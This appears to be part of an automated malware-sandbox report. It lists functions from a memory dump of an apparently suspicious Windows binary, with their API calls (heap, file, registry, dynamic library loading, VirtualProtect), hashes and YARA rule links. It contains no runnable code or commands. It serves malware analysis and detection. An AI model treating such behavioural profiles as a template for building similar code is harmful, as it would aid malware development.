                                                            • Opcode Fuzzy Hash: e3a0b9f78941b61d820d20448fa4f55f7f69494811f0e60097df83fa9cfa0e26
                                                            • Instruction Fuzzy Hash: 1E311271A00205EFDF11EF55E890AAE7BB9FB44750F104069E905FB281DB74AD44EF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457D680, Relevance: 7.6, APIs: 5, Instructions: 97memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 0457D702
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 0457D71B
                                                            • lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0457D728
                                                            • lstrlen.KERNEL32(0458D3A4,?,?,?,?,?,00000000,00000000,?), ref: 0457D73A
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 0457D76B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
                                                            • String ID:
                                                            • API String ID: 2734445380-0
                                                            • Opcode ID: 2c471cb2a4a428f12a050886ef741263ce49c30be1e6c44d9e05bc3ba9783c08
                                                            • Instruction ID: 855ea6cfe8c8654bb04d8775500e24133cc02f9983fe146a18fc61d7a5061af2
                                                            • Opcode Fuzzy Hash: 2c471cb2a4a428f12a050886ef741263ce49c30be1e6c44d9e05bc3ba9783c08
                                                            • Instruction Fuzzy Hash: 4F317071500209FFDB11DF95EC88EEA7BB8FF45314F104428F815A6240EB38E919EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456D290, Relevance: 7.6, APIs: 5, Instructions: 89memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04574211: RtlEnterCriticalSection.NTDLL(0458C328), ref: 04574219
                                                              • Part of subcall function 04574211: RtlLeaveCriticalSection.NTDLL(0458C328), ref: 0457422E
                                                              • Part of subcall function 04574211: InterlockedIncrement.KERNEL32(0000001C), ref: 04574247
                                                            • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0456D2C7
                                                            • memcpy.NTDLL(00000000,?,?), ref: 0456D2D8
                                                            • lstrcmpi.KERNEL32(00000002,?), ref: 0456D31E
                                                            • memcpy.NTDLL(00000000,?,?), ref: 0456D332
                                                            • HeapFree.KERNEL32(00000000,00000000,?), ref: 0456D378
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                                                            • String ID:
                                                            • API String ID: 733514052-0
                                                            • Opcode ID: 925a34b79ad2749891a3e59e64360a4f9b702ab09f9dba3653cd10a449166b30
                                                            • Instruction ID: 528f64ca81443994e4054c2f13057ad5679830bc5129339a45df69937b07618d
                                                            • Opcode Fuzzy Hash: 925a34b79ad2749891a3e59e64360a4f9b702ab09f9dba3653cd10a449166b30
                                                            • Instruction Fuzzy Hash: CA31B971A00215FFDB119FA8EC84A9E7BB9FB05358F144429F506E7200DB39ED48EB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457D528, Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04565D0B: lstrlen.KERNEL32(00000000,00000000,?,00000000,04574F14,00000000,00000000,00000000,?,04571CF2,00000000,00000000,00000000,00000000), ref: 04565D17
                                                            • RtlEnterCriticalSection.NTDLL(0458C328), ref: 0457D552
                                                            • RtlLeaveCriticalSection.NTDLL(0458C328), ref: 0457D565
                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0457D576
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 0457D5E1
                                                            • InterlockedIncrement.KERNEL32(0458C33C), ref: 0457D5F8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                                                            • String ID:
                                                            • API String ID: 3915436794-0
                                                            • Opcode ID: 9b89a91944c4c50f526e997fbc79e1e99d25994a50e3c7b76ae0e3a44d10a1fd
                                                            • Instruction ID: c472e2b95a5b94031162d43538e6584fa7f344d46f10b3b8b8fda62f435c55da
                                                            • Opcode Fuzzy Hash: 9b89a91944c4c50f526e997fbc79e1e99d25994a50e3c7b76ae0e3a44d10a1fd
                                                            • Instruction Fuzzy Hash: EA316D31604706DBDB21DF18E84492AB7F5FF44325B14452DF85A93250DF35E81AEBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457D9AF, Relevance: 7.6, APIs: 5, Instructions: 83libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(?,?,00000000,00000000,0457228F,00000000,73BCF5B0,0456824E,?,00000001), ref: 0457D9CF
                                                            • LoadLibraryA.KERNEL32(?), ref: 0457D9E4
                                                            • LoadLibraryA.KERNEL32(?), ref: 0457DA00
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0457DA15
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0457DA29
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: LibraryLoad$AddressProc
                                                            • String ID:
                                                            • API String ID: 1469910268-0
                                                            • Opcode ID: 6883b135fe94139c757b71887f7f3f0d3b995def4d3ff1427d06eeae86b67e5c
                                                            • Instruction ID: bacc6beba9e8155557c8fc307943bfd38260b1beb927264977655c28e49d76b3
                                                            • Opcode Fuzzy Hash: 6883b135fe94139c757b71887f7f3f0d3b995def4d3ff1427d06eeae86b67e5c
                                                            • Instruction Fuzzy Hash: DF312772A00205DFD702DF69E8C1A5673F8FB49714B04612DE608FB351DA38BC0DAB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456A4A1, Relevance: 7.6, APIs: 5, Instructions: 81filememoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000), ref: 045790FF
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579118
                                                              • Part of subcall function 045790ED: GetCurrentThreadId.KERNEL32 ref: 04579125
                                                              • Part of subcall function 045790ED: GetSystemTimeAsFileTime.KERNEL32(0456EE33,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579131
                                                              • Part of subcall function 045790ED: GetTempFileNameA.KERNEL32(00000000,00000000,0456EE33,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?), ref: 0457913F
                                                              • Part of subcall function 045790ED: lstrcpy.KERNEL32(00000000), ref: 04579161
                                                            • DeleteFileA.KERNEL32(00000000,000004D2), ref: 0456A4C4
                                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0456A4CD
                                                            • GetLastError.KERNEL32 ref: 0456A4D7
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0456A596
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                                                            • String ID:
                                                            • API String ID: 3543646443-0
                                                            • Opcode ID: 918661f9a07f2d6760da1b97c7a4a2914f32d62c354659eb6ade9658baab0bf6
                                                            • Instruction ID: 67879b14ac845af4977d311f6731f663da88e5be203596ddf67af381679ba6a2
                                                            • Opcode Fuzzy Hash: 918661f9a07f2d6760da1b97c7a4a2914f32d62c354659eb6ade9658baab0bf6
                                                            • Instruction Fuzzy Hash: 30216272501111EBD711BBA5FC88E9733ADFF86218B045125FA05E7145DE28FA08F770
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456D9B3, Relevance: 7.6, APIs: 5, Instructions: 75fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 045781D1: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04572283,00000000,73BCF5B0,0456824E,?,00000001), ref: 045781DD
                                                              • Part of subcall function 045781D1: _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 045781F3
                                                              • Part of subcall function 045781D1: _snwprintf.NTDLL ref: 04578218
                                                              • Part of subcall function 045781D1: CreateFileMappingW.KERNEL32(000000FF,0458C1A8,00000004,00000000,00001000,?), ref: 04578234
                                                              • Part of subcall function 045781D1: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 04578246
                                                              • Part of subcall function 045781D1: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 0457827E
                                                            • UnmapViewOfFile.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04572283,00000000,73BCF5B0,0456824E,?,00000001), ref: 0456D9EE
                                                            • CloseHandle.KERNEL32(?), ref: 0456D9F7
                                                            • SetEvent.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04572283,00000000,73BCF5B0,0456824E,?,00000001), ref: 0456DA3E
                                                            • GetLastError.KERNEL32(0456A8B7,00000000,00000000), ref: 0456DA6D
                                                            • CloseHandle.KERNEL32(00000000,0456A8B7,00000000,00000000), ref: 0456DA7D
                                                              • Part of subcall function 0456A20E: lstrlenW.KERNEL32(?,?,00000000,73B74D40,?,?,04581C44,?,73B74D40), ref: 0456A21A
                                                              • Part of subcall function 0456A20E: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,04581C44,?,73B74D40), ref: 0456A242
                                                              • Part of subcall function 0456A20E: memset.NTDLL ref: 0456A254
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                                                            • String ID:
                                                            • API String ID: 1106445334-0
                                                            • Opcode ID: 0fb6ad1e338cb3b1b6aa1eafdd8e57bd772fd041f661fd1a58fc0d471fb611c8
                                                            • Instruction ID: 4c5f25ec0fa4eca52d553df8e1933422466bcc4cfd6be187337578639b0feade
                                                            • Opcode Fuzzy Hash: 0fb6ad1e338cb3b1b6aa1eafdd8e57bd772fd041f661fd1a58fc0d471fb611c8
                                                            • Instruction Fuzzy Hash: 54214775608205EBEB11EFB4EC45B5A77B9FF84264B010829E946E3250EB25FD09EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04575EFC, Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,04575A38,00000000,?,?), ref: 04575F1A
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,04575A38,00000000,?,?,?,?,00000000,0456DBFF,?,?,?,?), ref: 04575F2A
                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,04575A38,00000000,?,?,?,?,00000000,0456DBFF), ref: 04575F56
                                                            • GetLastError.KERNEL32(?,?,04575A38,00000000,?,?,?,?,00000000,0456DBFF,?,?,?,?,00000000,?), ref: 04575F7B
                                                            • CloseHandle.KERNEL32(000000FF,?,?,04575A38,00000000,?,?,?,?,00000000,0456DBFF,?,?,?,?,00000000), ref: 04575F8C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: File$CloseCreateErrorHandleLastReadSize
                                                            • String ID:
                                                            • API String ID: 3577853679-0
                                                            • Opcode ID: 0d4cdeb688cb105fcda08e5068a5646a9b53ca11a6763fee4e31b939c922d461
                                                            • Instruction ID: 78f3e5fb4fbfac9fd6293c7e6a5d05186d1c6ad849a68811e74ba633dd536daa
                                                            • Opcode Fuzzy Hash: 0d4cdeb688cb105fcda08e5068a5646a9b53ca11a6763fee4e31b939c922d461
                                                            • Instruction Fuzzy Hash: 2311B7B210021DFFDB205F64FC84AAE7B6DFB45790F414539F915A7190EA71BD40A6A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04576E52, Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • StrChrA.SHLWAPI(?,0000002C), ref: 04576E63
                                                            • StrRChrA.SHLWAPI(?,00000000,0000002F), ref: 04576E7C
                                                            • StrTrimA.SHLWAPI(?,?), ref: 04576EA4
                                                            • StrTrimA.SHLWAPI(00000000,?), ref: 04576EB3
                                                            • HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 04576EEA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Trim$FreeHeap
                                                            • String ID:
                                                            • API String ID: 2132463267-0
                                                            • Opcode ID: 308a2b8edc3a091b0432ec372e50b9119c591a8ea641deaa17c6007bc660816d
                                                            • Instruction ID: 0d240efc95b629a47487c841a36914ac48903d971b0850b47c8512e8cc5038b5
                                                            • Opcode Fuzzy Hash: 308a2b8edc3a091b0432ec372e50b9119c591a8ea641deaa17c6007bc660816d
                                                            • Instruction Fuzzy Hash: AC119372600606BBD7219AA9EC85F9B7BACFB44760F041035FE04EB241DF64FC05A7A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457756D, Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualProtect.KERNEL32(00000000,00000004,00000040,00000000,0042B5A8,00000000,04561C48,?,?,?,0456CC9A,73B75520,?,0457070F,00000000,00000000), ref: 045775A4
                                                            • VirtualProtect.KERNEL32(00000000,00000004,00000000,00000000,?,0456CC9A,73B75520,?,0457070F,00000000,00000000,?,00000000,04561C48,00000000), ref: 045775D4
                                                            • RtlEnterCriticalSection.NTDLL(0458C300), ref: 045775E3
                                                            • RtlLeaveCriticalSection.NTDLL(0458C300), ref: 04577601
                                                            • GetLastError.KERNEL32(?,0456CC9A,73B75520,?,0457070F,00000000,00000000,?,00000000,04561C48,00000000), ref: 04577611
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                                            • String ID:
                                                            • API String ID: 653387826-0
                                                            • Opcode ID: 5474052db239fece9d5c2856b52ae8f8cb832340fc3b4d050afc17efc77be2ff
                                                            • Instruction ID: 9102b8f4fbadb20613197245c6ec6418c31560c14f6ace1748a7ac9abf51f8a0
                                                            • Opcode Fuzzy Hash: 5474052db239fece9d5c2856b52ae8f8cb832340fc3b4d050afc17efc77be2ff
                                                            • Instruction Fuzzy Hash: F521F8B5600706EFD721DFA9E98495ABBF8FB08300B004669EA56A3710DB74F904EB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04569100, Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00004000,00000000), ref: 0456912E
                                                            • GetLastError.KERNEL32 ref: 04569151
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04569164
                                                            • GetLastError.KERNEL32 ref: 0456916F
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 045691B7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                                                            • String ID:
                                                            • API String ID: 1671499436-0
                                                            • Opcode ID: 85955fb5da146fbda53bdd4ed99f0ec39a11f59f336ef046e5a6e0ca1931dba9
                                                            • Instruction ID: 650040a568aab941d896706236f3aeda0e7976adb84d9281098daf9d2038f7a0
                                                            • Opcode Fuzzy Hash: 85955fb5da146fbda53bdd4ed99f0ec39a11f59f336ef046e5a6e0ca1931dba9
                                                            • Instruction Fuzzy Hash: 40216FB0500244EBEB218F55ED8CB6A7BB9FB40359F701418E113A65A0DB75BE88FF10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456C547, Relevance: 7.6, APIs: 5, Instructions: 65registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0456C55B
                                                            • memcpy.NTDLL(00000000,0456F989,?,?,-00000005,?,0456F989,00000001,00000000,-00000005,00000001), ref: 0456C584
                                                            • RegSetValueExA.ADVAPI32(?,00000001,00000000,00000003,00000000,?), ref: 0456C5AD
                                                            • RegSetValueExA.ADVAPI32(?,00000001,00000000,00000003,00000000,00000000,-00000005,?,0456F989,00000001,00000000,-00000005,00000001), ref: 0456C5CD
                                                            • RegCloseKey.ADVAPI32(?,?,0456F989,00000001,00000000,-00000005,00000001), ref: 0456C5D8
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Value$AllocateCloseCreateHeapmemcpy
                                                            • String ID:
                                                            • API String ID: 2954810647-0
                                                            • Opcode ID: ff6f4c534a74a23c4dcff3c6b9e596bb8c324c69f17e24a9b18c0818ba99bdfd
                                                            • Instruction ID: a4433acd5b6368abab990e8db649288089e986dc897b3363a1a722998cfc8b2a
                                                            • Opcode Fuzzy Hash: ff6f4c534a74a23c4dcff3c6b9e596bb8c324c69f17e24a9b18c0818ba99bdfd
                                                            • Instruction Fuzzy Hash: B4118676200209FFDB126E64EC44EBA776EFB94751F440129FD02A3160EE71AE20B761
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457ED0E, Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(04568E44,?,?,?,?,00000008,04568E44,00000000,?,?,0456EE33,?,?,00000000,0457227C,00000000), ref: 0457ED2B
                                                            • memcpy.NTDLL(04568E44,?,00000009,?,?,?,?,00000008,04568E44,00000000,?,?,0456EE33,?,?,00000000), ref: 0457ED4D
                                                            • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 0457ED65
                                                            • lstrlenW.KERNEL32(00000000,00000001,04568E44,?,?,?,?,?,?,?,00000008,04568E44,00000000,?,?,0456EE33), ref: 0457ED85
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000008,04568E44,00000000,?), ref: 0457EDAA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 3065863707-0
                                                            • Opcode ID: f86f5cc967b076f5f566dff2382e8da08a379e9f54f617e87cbf5331a4fba6c7
                                                            • Instruction ID: 82df392957a7e8c3927e340566ff54e8df9bd10a274dcc05c05059072c028422
                                                            • Opcode Fuzzy Hash: f86f5cc967b076f5f566dff2382e8da08a379e9f54f617e87cbf5331a4fba6c7
                                                            • Instruction Fuzzy Hash: C9119635900208FBCB119B95EC49FDE7BBCFB48750F008069F915E7281DA74EA08EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457B895, Relevance: 7.6, APIs: 5, Instructions: 61stringtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrcmpi.KERNEL32(00000000,?), ref: 0457B8C4
                                                            • RtlEnterCriticalSection.NTDLL(0458C328), ref: 0457B8D1
                                                            • RtlLeaveCriticalSection.NTDLL(0458C328), ref: 0457B8E4
                                                            • lstrcmpi.KERNEL32(0458C340,00000000), ref: 0457B904
                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0456447E,00000000), ref: 0457B918
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                                                            • String ID:
                                                            • API String ID: 1266740956-0
                                                            • Opcode ID: eacb7cbfca1de477c768608889c6d5fd4771fb63fb3c2a66ea5df262ecfa84a4
                                                            • Instruction ID: 0ab612749baa27770514ab1777d03c21c7d798806462794d5d25048f33e1e49c
                                                            • Opcode Fuzzy Hash: eacb7cbfca1de477c768608889c6d5fd4771fb63fb3c2a66ea5df262ecfa84a4
                                                            • Instruction Fuzzy Hash: 7F118131900209EFDB15DF58E889A5AB7F8FB04329F04416DE419E3241DF38FD05ABA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04575440, Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000008,04569999,00000000,?,00000000,73B75520,00000000,?,04577991,?,?,?,00000000), ref: 0457544A
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0457546E
                                                            • StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,04577991,?,?,?,00000000,?,00000000,00000000), ref: 04575475
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 045754BD
                                                            • lstrcat.KERNEL32(00000000,?), ref: 045754CC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                                                            • String ID:
                                                            • API String ID: 2616531654-0
                                                            • Opcode ID: 658a7a30ee73d424532367f2b4c33c2ec50bcb83845b6928c09e0e2600d24cbb
                                                            • Instruction ID: da3b07d7254b7aa2735ef5daf8f8897d044830357b8e76d5b368154288d352a1
                                                            • Opcode Fuzzy Hash: 658a7a30ee73d424532367f2b4c33c2ec50bcb83845b6928c09e0e2600d24cbb
                                                            • Instruction Fuzzy Hash: 0511A33224031AABD3208B65E888F2B77EDFB84701F04802CF605E3540EF29F819A725
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045624CF, Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04565D0B: lstrlen.KERNEL32(00000000,00000000,?,00000000,04574F14,00000000,00000000,00000000,?,04571CF2,00000000,00000000,00000000,00000000), ref: 04565D17
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 045624F8
                                                            • memcpy.NTDLL(00000000,?,?), ref: 0456250B
                                                            • RtlEnterCriticalSection.NTDLL(0458C328), ref: 0456251C
                                                            • RtlLeaveCriticalSection.NTDLL(0458C328), ref: 04562531
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04562569
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 2349942465-0
                                                            • Opcode ID: b28e459347d8bddd2f1f29b06a76369fd2fe7960e4bbcf72a74eb489c95d2237
                                                            • Instruction ID: 3900290ab5688eb79b5d5c11cf21a3c5ae4d5adb05ee52cb1c8476229572446f
                                                            • Opcode Fuzzy Hash: b28e459347d8bddd2f1f29b06a76369fd2fe7960e4bbcf72a74eb489c95d2237
                                                            • Instruction Fuzzy Hash: FC11C676100211EFD7216F28EC84D2A7BADFB85326B01016DF41767241DE25BC0AFB71
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457D496, Relevance: 7.6, APIs: 5, Instructions: 57memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(?,00000000,?,?,?,045623D0,?,?,00000000), ref: 0457D4AC
                                                            • lstrlen.KERNEL32(?,?,?,?,045623D0,?,?,00000000), ref: 0457D4B3
                                                            • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 0457D4C1
                                                              • Part of subcall function 0457F3A1: GetLocalTime.KERNEL32(00000000,00000000), ref: 0457F3AB
                                                              • Part of subcall function 0457F3A1: wsprintfA.USER32 ref: 0457F3DE
                                                            • wsprintfA.USER32 ref: 0457D4E3
                                                              • Part of subcall function 0457A8BA: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,0457D50B,00000000,?,00000000,00000000,00000006,00000000), ref: 0457A8D8
                                                              • Part of subcall function 0457A8BA: wsprintfA.USER32 ref: 0457A8FD
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,00000000), ref: 0457D514
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                                                            • String ID:
                                                            • API String ID: 3847261958-0
                                                            • Opcode ID: c5c7b9b0d121857e19cc64b337497fec115dc78d4408261f6ca5353dd2f6bd03
                                                            • Instruction ID: ea24486d33c25d82808d912c5676cc9c267245a669c7e230470ec236a05bba76
                                                            • Opcode Fuzzy Hash: c5c7b9b0d121857e19cc64b337497fec115dc78d4408261f6ca5353dd2f6bd03
                                                            • Instruction Fuzzy Hash: B2016132100219FBDB112F66EC44EAB7F6DFF84364B004025FD19A6212DA3AAD59FF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456DAB7, Relevance: 7.6, APIs: 5, Instructions: 55memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 0456DACE
                                                              • Part of subcall function 0456F461: wcstombs.NTDLL ref: 0456F51F
                                                            • lstrlen.KERNEL32(?,?,?,?,?,04562FA8,?,?), ref: 0456DAF1
                                                            • lstrlen.KERNEL32(?,?,?,?,04562FA8,?,?), ref: 0456DAFB
                                                            • memcpy.NTDLL(?,?,00004000,?,?,04562FA8,?,?), ref: 0456DB0C
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,04562FA8,?,?), ref: 0456DB2E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heaplstrlen$AllocateFreememcpywcstombs
                                                            • String ID:
                                                            • API String ID: 1256246205-0
                                                            • Opcode ID: b3c9ada2f4f30a02e0f305f729887b5b1851d62c58fb38e6e5439d4caf3d20d3
                                                            • Instruction ID: 02b27e3958faf89c999cae278ae2fe5bcdbcbe7672087d28c4ca9d84b1487f62
                                                            • Opcode Fuzzy Hash: b3c9ada2f4f30a02e0f305f729887b5b1851d62c58fb38e6e5439d4caf3d20d3
                                                            • Instruction Fuzzy Hash: EA118B72600204EFCB109F55EC44F5ABBB9FB85324F204428E906A3260EA31EE08FB24
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045793FF, Relevance: 7.5, APIs: 5, Instructions: 49memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04574B63: lstrlen.KERNEL32(?,770F4620,00000000,?,00000000,04561211,?), ref: 04574B72
                                                              • Part of subcall function 04574B63: mbstowcs.NTDLL ref: 04574B8E
                                                            • lstrlenW.KERNEL32(00000000,73BCF560,00000000,?,00000000), ref: 0457942B
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0457943D
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0457945A
                                                            • lstrlenW.KERNEL32(00000000), ref: 04579466
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0457947A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                                                            • String ID:
                                                            • API String ID: 3403466626-0
                                                            • Opcode ID: 16603e6e055a22aa737e01afa54eaed9d7eaa3418e101dc9e64edd953dcccbd7
